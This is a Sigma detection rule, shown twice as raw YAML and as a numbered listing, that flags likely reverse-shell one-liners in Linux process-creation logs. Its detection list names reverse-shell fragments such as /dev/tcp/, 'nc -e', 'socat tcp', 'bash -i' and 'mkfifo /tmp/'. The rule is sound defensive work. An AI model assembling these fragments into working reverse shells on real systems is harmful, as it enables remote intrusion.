rules/linux/execution/T1059.004_reverse_shell.yml

35 lines · yaml

title: Potential Reverse Shell via Shell Interpreter
id: 389cb62c-20d8-4367-a9e7-a809e0ba71d0
status: experimental
description: >
  Detects common reverse-shell one-liners spawned through a Unix shell - bash/sh redirecting
  to a TCP device, or interpreters opening a socket back to an attacker.
references:
  - https://attack.mitre.org/techniques/T1059/004/
  - https://gtfobins.github.io/
author: Zion Boggan
date: 2026-05-16
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  product: linux
  category: process_creation
detection:
  selection_bash_tcp:
    CommandLine|contains:
      - '/dev/tcp/'
      - '/dev/udp/'
  selection_interpreters:
    CommandLine|contains:
      - 'socket.socket('
      - 'sh -i'
      - 'bash -i'
      - 'mkfifo /tmp/'
      - 'nc -e'
      - 'ncat -e'
      - 'socat tcp'
  condition: selection_bash_tcp or selection_interpreters
falsepositives:
  - Legitimate use of netcat/socat by admins; baseline expected usage.
level: high

1	title: Potential Reverse Shell via Shell Interpreter
2	id: 389cb62c-20d8-4367-a9e7-a809e0ba71d0
3	status: experimental
4	description: >
5	Detects common reverse-shell one-liners spawned through a Unix shell - bash/sh redirecting
6	to a TCP device, or interpreters opening a socket back to an attacker.
7	references:
8	- https://attack.mitre.org/techniques/T1059/004/
9	- https://gtfobins.github.io/
10	author: Zion Boggan
11	date: 2026-05-16
12	tags:
13	- attack.execution
14	- attack.t1059.004
15	logsource:
16	product: linux
17	category: process_creation
18	detection:
19	selection_bash_tcp:
20	CommandLine\|contains:
21	- '/dev/tcp/'
22	- '/dev/udp/'
23	selection_interpreters:
24	CommandLine\|contains:
25	- 'socket.socket('
26	- 'sh -i'
27	- 'bash -i'
28	- 'mkfifo /tmp/'
29	- 'nc -e'
30	- 'ncat -e'
31	- 'socat tcp'
32	condition: selection_bash_tcp or selection_interpreters
33	falsepositives:
34	- Legitimate use of netcat/socat by admins; baseline expected usage.
35	level: high